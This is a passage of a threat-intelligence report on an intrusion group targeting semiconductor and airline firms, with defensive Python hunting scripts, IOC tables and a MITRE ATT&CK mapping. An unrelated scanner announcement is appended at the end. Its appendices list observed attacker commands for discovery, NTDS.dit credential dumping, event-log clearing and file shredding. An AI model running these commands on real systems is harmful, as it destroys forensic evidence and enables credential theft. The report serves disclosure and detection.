In one intrusion we investigated, the victim had years of logging of outgoing DNS requests available. The DNS responses weren't logged, meaning that only the DNS C2 leaving the victim's network was captured. We developed a Python script that decoded and combined most of the logged C2 communication into a human-readable format. As the adversary used Cobalt Strike with DNS as the command and control protocol, we were able to reconstruct more than two years of adversary activity.

With all this activity data, it was possible to create some insight into the 'office hours' of this adversary. The activity took place six days a week, rarely on Sundays. It started on average at 02:36 UTC and rarely ended after 13:00 UTC. We also observed some periods where we expected activity of the adversary but saw almost none; these periods match the Chinese Golden Week holiday.

Figure 2: Heatmap of activity. Times on the X-axis are in UTC.
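
As an illustration of the decoding step described above: with the trial version's encryption absent, the beacon's outbound data survives in the query names themselves. The sketch below is a simplification, not our actual script; the exact label encoding varies per beacon version, so it merely assumes hex-encoded payload labels under a hypothetical C2 parent domain:

import binascii

C2_PARENT = "example-c2.com"  # hypothetical C2 parent domain

def decode_query(fqdn: str) -> bytes:
    # Drop the parent domain, join the remaining labels, and try to hex-decode.
    blob = "".join(fqdn[: -len(C2_PARENT) - 1].split("."))
    if len(blob) % 2:
        return b""
    try:
        return binascii.unhexlify(blob)
    except binascii.Error:
        return b""  # counter/keep-alive labels won't decode

with open("dns_queries.txt") as f:  # hypothetical export: one queried FQDN per line
    for line in f:
        fqdn = line.strip().lower()
        if fqdn.endswith("." + C2_PARENT):
            data = decode_query(fqdn)
            if data:
                print(fqdn, "->", data)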

The adversary also changed their command and control domains around the same time they switched C2 protocols. In 2017 and 2018 they used a subdomain under a regular parent domain with a .com TLD, but in 2019 they started using subdomains under the parent domains appspot.com and azureedge.net. The parent domain appspot.com is owned by Google and is part of Google's App Engine platform as a service; azureedge.net is owned by Microsoft and is part of Microsoft's Azure content delivery network.

Exfiltration (TA0010)

The adversary uses the command and control channel to exfiltrate small amounts of data, usually information containing account details. For large amounts of data, such as mailboxes and network shares with intellectual property, they use something else.

Once the larger chunks of data are compressed, encrypted, and staged, the data is exfiltrated using a custom-built tool. This tool exfiltrates specified files to cloud storage web services. The following cloud storage web services are supported by the malware:

  • Dropbox
  • Google Drive
  • OneDrive

The actor specifies the following arguments when running the exfiltration tool:

  • Name of the web service to be used
  • Parameters used for the web service, such as a client ID and/or API key
  • Path of the file to read and exfiltrate to the web service

We have observed the exfiltration tool in the following locations:

  • C:\Windows\Temp\msadcs.exe
  • C:\Windows\Temp\OneDrive.exe

Hashes of these files are listed at the end of this article.
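
On the network side, this exfiltration pattern shows up as unusually large uploads to consumer cloud storage. A minimal hunting sketch, assuming proxy logs exported to a CSV with hypothetical client_ip, host, and bytes_out columns; the domain list is illustrative, not exhaustive:

import csv
from collections import defaultdict

CLOUD_STORAGE = ("dropbox.com", "drive.google.com", "onedrive.live.com")
THRESHOLD = 100 * 1024 * 1024  # 100 MB; tune to the environment

totals = defaultdict(int)
with open("proxy_log.csv", newline="") as f:  # hypothetical proxy log export
    for row in csv.DictReader(f):
        host = row["host"].lower()
        if host.endswith(CLOUD_STORAGE):
            totals[(row["client_ip"], host)] += int(row["bytes_out"])

# Servers rarely have a legitimate reason to push gigabytes to these services.
for (client, host), sent in sorted(totals.items(), key=lambda kv: -kv[1]):
    if sent >= THRESHOLD:
        print(f"{client} -> {host}: {sent} bytes uploaded")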

Defense evasion (TA0005)

The adversary attempts to clean up some of the traces of their intrusions. While we don't know everything that was deleted, nor could we recover it, we did observe some of their anti-forensic activity:

  • Clearing Windows event logs
  • File deletion
  • Timestomping

An overview of the observed commands can be found in the appendix.

For Indicator Removal on Host: Timestomp, the adversary uses a Windows version of the Linux touch command, included in the UnxUtils repository. This ensures that the adversary's tools blend in with the other files in a directory when viewed in a timeline. Creating a timeline is a common step for forensic analysts to obtain a chronological view of events on a system.
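
Timestomping is rarely perfect, though. A simplistic heuristic, sketched below, flags files whose modification time precedes their creation time; a real investigation would instead compare the $STANDARD_INFORMATION and $FILE_NAME timestamps in the NTFS MFT. The path is illustrative:

import os
from datetime import datetime, timezone

def flag_timestomp_candidates(directory: str) -> None:
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        st = os.stat(path)
        created = getattr(st, "st_birthtime", st.st_ctime)  # creation time on Windows/macOS
        # A file "modified" before it was created suggests altered timestamps.
        if st.st_mtime < created:
            mtime = datetime.fromtimestamp(st.st_mtime, timezone.utc)
            btime = datetime.fromtimestamp(created, timezone.utc)
            print(f"{path}: modified {mtime:%Y-%m-%d %H:%M} < created {btime:%Y-%m-%d %H:%M}")

flag_timestomp_candidates(r"C:\Windows\Temp")  # illustrative staging folder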

The same activity group?

A number of our intrusions involved tips from an industry partner who was able to correlate some of their upstream activity.

Our threat intelligence analysts observed clear overlap, in both infrastructure and capabilities, between the various cases that NCC Group and Fox-IT worked on, and as a result we assess with moderate confidence that one activity group was carrying out the intrusions across the different types of victims.

Some of the overlap is very generic and shared by a lot of groups, like the use of Cobalt Strike or exfiltration to OneDrive. But the tool used for exfiltration to OneDrive is very specific to this adversary, as is the use of appspot and azureedge domains. The naming conventions for their subdomains, tools, and scripts overlap too. In summary:

The adversary: Working hours match with GMT+8.

Infrastructure: appspot.com and azureedge.net for C2 with a strong overlap in naming convention for subdomains and actual overlap in some subdomains between intrusions.

Capability: Password spraying/credential stuffing. Cobalt Strike. Copy NTDS.dit. Use scheduled tasks and batch files for automation. The use of LOLBins. WinRAR. Cloud exfil tool and exfil to OneDrive. Erasing Windows Event Logs, files and tasks. Overlap in filenames for tools, staged data, and folders.

Victim: Semiconductors and aviation industry.

We considered labelling them as two activity groups because of the difference in victims between the various intrusions. But all the other overlap is strong enough for us to consider it one group right now. This group might simply have gotten a new customer interested in different data, changing the intent and victimology of the adversary.

But most importantly: The largest overlap is in the top half of the pyramid of pain: domain names, host artifacts, tools, and TTPs. And these are the hardest for the adversary to change, and most effective for long-lasting detection!

Figure 3: Pyramid of pain by David J Bianco

Fox-IT and NCC Group found very strong overlap between what we've seen in our intrusions and what CyCraft describes in their APT Group Chimera report and Black Hat presentation. The bulk of the victims they describe are in different regions than we observed, which is likely caused by field-of-view bias. SentinelOne also describes an attack and shares IOCs that show strong overlap with the intrusions we investigated.

Conclusion

At this moment, based on the observed evidence, we believe that the various intrusions were performed by the same group. We can only report what we observed: first they stole intellectual property in the high-tech sector, later they stole passenger name records (PNR) from airlines, both across geographical locations. Both types of stolen data are very useful for nation states.

Answering whether this group is an advanced persistent threat (APT), has some sort of state affiliation, or where they come from goes beyond the scope of this write-up. The threat intelligence and IOCs we are sharing are intended to help discover and prevent intrusions by this and similar adversaries.

A word of thanks goes out to all the forensic experts, incident responders, and threat intelligence analysts who helped victims identify and eradicate the adversary, and to everybody at NCC Group and Fox-IT (part of NCC Group) who contributed to this article.

IOC

Type Data Observed Note
Binary MD5 133a159e86ff48c59e79e67a3b740c1e get.exe (GetHttpsInfo)
Binary MD5 328ba584bd06c3083e3a66cb47779eac psloglist.exe
Binary MD5 65cf35ddcb42c6ff5dc56d6259cc05f3 update.exe (WinRAR)
Binary MD5 4d5440282b69453f4eb6232a1689dd4a msadcs.exe (Cloud exfil tool)
Binary MD5 90508ff4d2fc7bc968636c716d84e6b4 msadcs.exe (Cloud exfil tool)
Binary MD5 c9b8cab697f23e6ee9b1096e312e8573 jucheck.exe (WinRAR)
Binary MD5 dd138a8bc1d4254fed9638989da38ab1 msadcs.exe (NTDSAudit)
C2 domain EuDbSyncUp[.]com Q4 2017 – Q4 2018
C2 domain UsMobileSos[.]com Q4 2017 – Q4 2018
C2 domain officeeuupdate.appspot[.]com Q4 2017 – Q4 2018
C2 domain MsCupDb[.]com Q4 2017 – Q4 2018
C2 domain officeeuropupd.appspot[.]com Q3 2019 – Q1 2020
C2 domain platform-appses.appspot[.]com Q4 2019 – Q1 2020
C2 domain watson-telemetry.azureedge[.]net Q4 2019 – Q1 2020
C2 domain europe-s03213.appspot[.]com 2019
C2 domain eustylejssync.appspot[.]com  2019
C2 domain fsdafdsfdsaflkjkxvzcuifsad.azureedge[.]net 2019
C2 domain ictsyncserver.appspot[.]com 2019
C2 domain sowfksiw38f2aflwfif.azureedge[.]net  2019
Filename fs_action*.bat Task automation
Filename fs_action*.ps1 Task automation
Filename update.bat Task automation
Filename update*.bat Task automation
Filename *dsinternals*.dll  Dsinternals lib files 
Filename get.exe GetHttpsInfo
Filename adsDL_<dir>.log Staging data
Filename group_membership.csv SharpHound output
Filename local_admins.csv SharpHound output
Filename msadcs.exe Various tools
Filename msadcs1.exe WinRAR
Filename OneDrive.exe Cloud data exfil
Filename sessions.csv SharpHound output
Filename RecordedTV.ms WinRAR
Filename RecordedTV_*.csv Staging data
Filename RecordedTV_*.ms Staging data
Filename RecordedTV_*.rar Staging data
Filename RecordedTV_*.txt Staging data
Filename teredo.tmp WinRAR
Filename update.exe WinRAR
Filename hsperfdata.sqm Archive with tools
Filename update*.log Staging data
Hostname DESKTOP-0FVJ37C Origin of login to Exchange
IPv4 address 47.75.0[.]147 Q2 2019 Password spray
IPv4 address 59.47.4[.]27 Q2 2019 ADFS login
IPv4 address 45.9.248[.]74 Q2 2019 Citrix login
IPv4 address 172.111.210[.]53 Q2 2019 Citrix login
IPv4 address 103.51.145[.]123  2019 Initial access 
IPv4 address 119.39.248[.]32  2019 Initial access
IPv4 address 120.227.35[.]98  2019 Initial access
IPv4 address 14.229.140[.]66  2019 Mount the file-share 
IPv4 address 172.111.210[.]53  2019 Initial access
IPv4 address 188.72.99[.]41  2019 Initial access
IPv4 address 45.9.248[.]74  2019 Initial access
IPv4 address 47.75.0[.]147  2019 Password spray
IPv4 address 5.254.112[.]226  2019 Initial access
IPv4 address 5.254.64[.]234  2019 Initial access
IPv4 address 59.47.4[.]27  2019 Initial access
IPv4 address 39.109.5[.]135 Q3 2017 VPN server login
IPv4 address 43.250.200[.]106 Q3 2017 VPN server login
IPv4 address 119.39.248[.]101 Q3 2017 VPN server login
IPv4 address 220.202.152[.]47 Q3 2017 VPN server login
IPv4 address 119.39.248[.]20 Q3 2017 VPN server login
IPv4 address 185.170.210[.]84 Q3 2017 VPN server login
IPv4 address 43.250.201[.]71 Q3 2017 VPN server login
IPv4 address 23.236.77[.]94 Q3 2017 ADFS login
Path C:\Code\NtdsAudit\src\NtdsAudit\obj\Release\ NTDSAudit artifacts
Path C:\Users\Public\Appdata\Local\ Staging and tools
Path C:\Users\Public\Appdata\Local\Microsoft\Windows\INetCache Staging and tools
Path C:\Users\Public\Libraries\ Staging and tools
Path C:\Users\Public\Videos\ Staging and tools
Path C:\Windows\Temp\ Staging and tools
Path C:\Windows\Temp\tmp Staging and tools
URI in CS beacon /externalscripts/jquery/jquery-3.3.1.min.js  Q3 2019 – Q1 2020
URI in CS beacon /externalscripts/jquery/jquery-3.3.2.min.js Q2 2019 – Q3 2019
URI in CS beacon /jquery-3.3.2.slim.min.js Q1 2020
User-agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Web VPN login
User-agent Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Cobalt Strike beacon

Observed discovery commands

Technique Command
Account discovery net user
Account discovery net user Administrator
Account discovery net user /domain
Account discovery dir \\<hostname>\c$\users
Account discovery dsquery user -limit 0 -s <hostname>
Account discovery psloglist.exe -accepteula -x security -s -a <current_date>
Account discovery msadcs.exe "NTDS.dit" -s "SYSTEM" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv
Browser bookmark discovery type \\<hostname>\c$\Users\<username>\Favorites\Links\Bookmarks bar\Imported From IE\*citrix*
Domain trust discovery nltest /domain_trusts
File and directory discovery dir \\<hostname>\c$\
File and directory discovery dir /o:d /x /s c:\
File and directory discovery dir /o:d /x \\<hostname>\<fileshare>
File and directory discovery cacls <path to file>
Network service scanning get -b <start ip> -e <end ip> -p
Network service scanning get -b <start ip> -e <end ip>
Network share discovery net share
Network share discovery net view \\<hostname>
Permission groups discovery net localgroup administrators
Process discovery tasklist /v |findstr explorer
Process discovery tasklist /v |findstr taskhost
Process discovery tasklist /v |findstr 1716
Process discovery tasklist /v /s <hostname/ip>
Query registry reg query \\<host>\HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers
Query registry reg query \\<host>\HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Remote system discovery type \\<host>\c$\Users\<username>\Favorites\Links\Bookmarks bar\Imported From IE\*citrix*
Remote system discovery type \\<host>\<path>\Cookies\*ctx*
Remote system discovery reg query \\<host>\HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers
Remote system discovery dir /o:d /x \\<hostname>\c$\users\<username>\Favorites
Remote system discovery net view \\hostname
Remote system discovery dsquery server -limit 0
System information discovery fsutil fsinfo drives
System information discovery systeminfo
System information discovery vssadmin list shadows
System network configuration discovery ipconfig
System network configuration discovery ipconfig /all
System network configuration discovery ping -n 1 -a <ip>
System network configuration discovery ping -n 1 <hostname>
System network configuration discovery tracert <ip>
System network configuration discovery pathping <ip>
System network connections discovery netstat -ano | findstr EST
System Owner/User Discovery quser
System service discovery net start
System service discovery net use
System time discovery time /t
System time discovery net time \\<ip/hostname>

Observed Defense evasion commands


Indicator Removal on Host: Clear Windows Event Logs

wevtutil cl "Windows PowerShell"
wevtutil cl application
wevtutil cl security
wevtutil cl setup
wevtutil cl system

Indicator Removal on Host: File Deletion

del /f/q *.csv *.bin
del /f/q *.exe
del /f/q *.exe *log.txt
del /f/q *.ost
del /f/q *.rar update*.txt
del /f/q \\<ip>\c$\windows\temp\*.txt
del /f/q \\<hostname>\c$\Progra~1\Common~1\System\msadc\msadcs.dmp
del /f/q msadcs*
del /f/q psloglist.exe
del /f/q update*
del /f/q update*.txt
del /f/q update*.rar
del /f/q update*rar
del /f/q update12321312.rar

schtasks /delete /s /tn "update" /f
schtasks /delete /tn "update" /f

shred -n 123 -z -u *.tar.gz

MITRE ATT&CK references

Name Type ID More info
Initial Access Tactic TA0001 https://attack.mitre.org/tactics/TA0001/
External Remote Services Technique T1133 https://attack.mitre.org/techniques/T1133/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Execution Tactic TA0002 https://attack.mitre.org/tactics/TA0002/
Command and Scripting Interpreter: PowerShell Technique T1059.001 https://attack.mitre.org/techniques/T1059/001/
Command and Scripting Interpreter: Windows Command Shell Technique T1059.003 https://attack.mitre.org/techniques/T1059/003/
Scheduled Task/Job: Scheduled Task Technique T1053.005 https://attack.mitre.org/techniques/T1053/005/
System Services: Service Execution Technique T1569.002 https://attack.mitre.org/techniques/T1569/002/
Windows Management Instrumentation Technique T1047 https://attack.mitre.org/techniques/T1047/
Persistence Tactic TA0003 https://attack.mitre.org/tactics/TA0003/
External Remote Services Technique T1133 https://attack.mitre.org/techniques/T1133/
Hijack Execution Flow: DLL Side-Loading Technique T1574.002 https://attack.mitre.org/techniques/T1574/002/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Privilege Escalation Tactic TA0004 https://attack.mitre.org/tactics/TA0004/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Defense Evasion Tactic TA0005 https://attack.mitre.org/tactics/TA0005/
Deobfuscate/Decode Files or Information Technique T1140 https://attack.mitre.org/techniques/T1140/
Indicator Removal on Host: Clear Windows Event Logs Technique T1070.001 https://attack.mitre.org/techniques/T1070/001/
Indicator Removal on Host: File Deletion Technique T1070.004 https://attack.mitre.org/techniques/T1070/004/
Indicator Removal on Host: Timestomp Technique T1070.006 https://attack.mitre.org/techniques/T1070/006/
Hijack Execution Flow: DLL Side-Loading Technique T1574.002 https://attack.mitre.org/techniques/T1574/002/
Masquerading: Rename System Utilities Technique T1036.003 https://attack.mitre.org/techniques/T1036/003/
Masquerading: Match Legitimate Name or Location Technique T1036.005 https://attack.mitre.org/techniques/T1036/005/
Use Alternate Authentication Material: Pass the Hash Technique T1550.002 https://attack.mitre.org/techniques/T1550/002/
Valid Accounts Technique T1078 https://attack.mitre.org/techniques/T1078/
Credential Access Tactic TA0006 https://attack.mitre.org/tactics/TA0006/
Brute Force: Password Spraying Technique T1110.003 https://attack.mitre.org/techniques/T1110/003/
Brute Force: Credential Stuffing Technique T1110.004 https://attack.mitre.org/techniques/T1110/004/
OS Credential Dumping: LSASS Memory Technique T1003.001 https://attack.mitre.org/techniques/T1003/001/
OS Credential Dumping: NTDS Technique T1003.003 https://attack.mitre.org/techniques/T1003/003/
Two-Factor Authentication Interception Technique T1111 https://attack.mitre.org/techniques/T1111/
Discovery Tactic TA0007 https://attack.mitre.org/tactics/TA0007/
Account Discovery Technique T1087 https://attack.mitre.org/techniques/T1087/
Account Discovery: Local Account Technique T1087.001 https://attack.mitre.org/techniques/T1087/001/
Account Discovery: Domain Account Technique T1087.002 https://attack.mitre.org/techniques/T1087/002/
Browser Bookmark Discovery Technique T1217 https://attack.mitre.org/techniques/T1217/
Domain Trust Discovery Technique T1482 https://attack.mitre.org/techniques/T1482/
File and Directory Discovery Technique T1083 https://attack.mitre.org/techniques/T1083
Network Service Scanning Technique T1046 https://attack.mitre.org/techniques/T1046
Network Share Discovery Technique T1135 https://attack.mitre.org/techniques/T1135
Permission Groups Discovery Technique T1069 https://attack.mitre.org/techniques/T1069
Process Discovery Technique T1057 https://attack.mitre.org/techniques/T1057
Query Registry Technique T1012 https://attack.mitre.org/techniques/T1012
Remote System Discovery Technique T1018 https://attack.mitre.org/techniques/T1018
System Information Discovery Technique T1082 https://attack.mitre.org/techniques/T1082
System Network Configuration Discovery Technique T1016 https://attack.mitre.org/techniques/T1016
System Network Connections Discovery Technique T1049 https://attack.mitre.org/techniques/T1049
System Owner/User Discovery Technique T1033 https://attack.mitre.org/techniques/T1033
System Service Discovery Technique T1007 https://attack.mitre.org/techniques/T1007
System Time Discovery Technique T1124 https://attack.mitre.org/techniques/T1124
Lateral Movement Tactic TA0008 https://attack.mitre.org/tactics/TA0008/
Lateral Tool Transfer Technique T1570 https://attack.mitre.org/techniques/T1570/
Remote Services: SMB/Windows Admin Shares Technique T1021.002 https://attack.mitre.org/techniques/T1021/002/
Remote Services: SSH Technique T1021.004 https://attack.mitre.org/techniques/T1021/004/
Remote Services: Windows Remote Management Technique T1021.006 https://attack.mitre.org/techniques/T1021/006/
Use Alternate Authentication Material: Pass the Hash Technique T1550.002 https://attack.mitre.org/techniques/T1550/002/
Collection Tactic TA0009 https://attack.mitre.org/tactics/TA0009/
Archive Collected Data: Archive via Utility Technique T1560.001 https://attack.mitre.org/techniques/T1560/001/
Automated Collection Technique T1119 https://attack.mitre.org/techniques/T1119/
Data from Information Repositories: SharePoint Technique T1213.002 https://attack.mitre.org/techniques/T1213/002/
Data from Local System Technique T1005 https://attack.mitre.org/techniques/T1005/
Data from Network Shared Drive Technique T1039 https://attack.mitre.org/techniques/T1039/
Data Staged: Local Data Staging Technique T1074.001 https://attack.mitre.org/techniques/T1074/001/
Data Staged: Remote Data Staging Technique T1074.002 https://attack.mitre.org/techniques/T1074/002/
Email Collection: Local Email Collection Technique T1114.001 https://attack.mitre.org/techniques/T1114/001/
Command and Control Tactic TA0011 https://attack.mitre.org/tactics/TA0011/
Application Layer Protocol: Web Protocols Technique T1071.001 https://attack.mitre.org/techniques/T1071/001/
Application Layer Protocol: DNS Technique T1071.004 https://attack.mitre.org/techniques/T1071/004/
Encrypted Channel: Asymmetric Cryptography Technique T1573.002 https://attack.mitre.org/techniques/T1573/002/
Protocol Tunneling Technique T1572 https://attack.mitre.org/techniques/T1572/
Exfiltration Tactic TA0010 https://attack.mitre.org/tactics/TA0010/
Automated Exfiltration Technique T1020 https://attack.mitre.org/techniques/T1020/
Data Transfer Size Limits Technique T1030 https://attack.mitre.org/techniques/T1030/
Exfiltration Over C2 Channel Technique T1041 https://attack.mitre.org/techniques/T1041/
Exfiltration Over Web Service: Exfiltration to Cloud Storage Technique T1567.002 https://attack.mitre.org/techniques/T1567/002/

Announcing ECG v2.0

By: voidsec
11 January 2021 at 13:39

We are proud to announce that ECG has received its first major update. ECG is the first and only commercial solution (a static source code scanner) able to analyze and detect real and complex security vulnerabilities in TCL/ADP source code. ECG v2.0's new features include On-Premises Deploy: Scan your code repository on your secure and highly-scalable offline appliance with a local […]

The post Announcing ECG v2.0 appeared first on VoidSec.
